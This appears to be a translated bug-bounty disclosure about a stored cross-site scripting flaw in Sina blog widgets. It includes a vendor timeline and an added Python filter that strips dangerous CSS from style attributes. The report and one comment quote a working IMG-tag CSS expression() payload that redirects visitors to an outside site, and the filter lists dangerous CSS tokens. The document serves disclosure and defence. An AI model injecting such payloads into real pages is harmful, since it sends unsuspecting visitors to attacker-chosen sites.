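2011-11-28: Details reported to the vendor; awaiting vendor handling
2011-11-28: Vendor has confirmed; details disclosed to the vendor only
2011-12-08: Details disclosed to core white hats and experts in related fields
2011-12-18: Details disclosed to regular white hats
2011-12-28: Details disclosed to intern white hats
2011-12-28: Details disclosed to the public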
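I get this ad on QQ every day: "A must-read for women" http://blog.sina.com.cn/u/2439749250. It is a Sina blog with a piece of code inserted into it; Sina does not filter it, so it can redirect the visitor directly.
We view the page source.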
The part that causes the direct redirect is:
</div> <div class="SG_connBody"> <div class="diywidget"><DIV CLASS="SG_connBody"><DIV CLASS="diywidget"><IMG STYLE="x:expression(if(window.r!=1){window.r=1; window.location.href=" http://www.zzpbz.com"})" /></DIV></DIV></div> </div> <div class="SG_connFoot"></div> </div>
You are good at this: filter the characters.
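An added example (not code from the original report or from Sina) of the filtering the report asks for: rather than deleting substrings, it normalises each style attribute (CSS comments, backslash escapes, fullwidth letters) and drops the whole attribute when dynamic CSS such as expression() remains. The function names and the sample markup with its placeholder host are assumptions, and only the style-attribute vector shown above is handled.

```python
import html
import re
import unicodedata
from html.parser import HTMLParser

# Tokens that make a style value executable or let it pull in remote code.
DANGEROUS = ("expression(", "javascript:", "vbscript:", "behavior:url(",
             "-moz-binding", "@import")
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.S)


def _unescape(m):
    if m.group(1):                                # hex escape such as \65
        cp = int(m.group(1), 16)
        return chr(cp) if 0 < cp <= 0x10FFFF else ""
    return m.group(2)                             # literal escape such as \(


def _squash(s):
    return re.sub(r"[\s\x00-\x1f]+", "", s).lower()


def style_is_dangerous(style):
    """True if dynamic CSS survives in the value once obfuscation is undone."""
    s = unicodedata.normalize("NFKC", style)      # fullwidth letters -> ASCII
    bare = CSS_COMMENT.sub("", s)                 # exp/**/ression
    forms = (s, bare, CSS_ESCAPE.sub(_unescape, bare))   # \65 xpression
    return any(tok in _squash(f) for f in forms for tok in DANGEROUS)


class StyleFilter(HTMLParser):
    """Re-serialises markup and drops every style attribute flagged above."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped = [], []           # dropped: (tag, style) for logging

    def _emit(self, tag, attrs, self_closing):
        parts = [tag]
        for name, value in attrs:                 # names arrive lower-cased
            if name == "style" and value and style_is_dangerous(value):
                self.dropped.append((tag, value))
                continue
            parts.append(name if value is None
                         else f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + (" />" if self_closing else ">"))

    def handle_starttag(self, tag, attrs):
        self._emit(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._emit(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def filter_widget_html(markup):
    parser = StyleFilter()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample modelled on the widget payload above; the host is a placeholder.
SAMPLE = ('<div class="diywidget"><IMG STYLE="x:expression(if(window.r!=1)'
          "{window.r=1;window.location.href='http://redirect.example/'})\" />"
          '<p style="color: red">ok</p></div>')
```

Dropping the attribute instead of cutting out the matched word avoids the case where removing one token splices a new one together from the text around it.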
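Severity: Low
Vulnerability Rank: 5
Confirmed at: 2011-11-28 21:20
Thanks for the report; we will fix it right away.
None yet
There's a picture, so there's proof.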
<IMG STYLE="x:expression(if(window.r!=1){window.r=1; window.location.href=" http://www.Php0day.com"})" />
@xsser Is my rank value wrong? It went from over a hundred to sixty-something... Please explain why.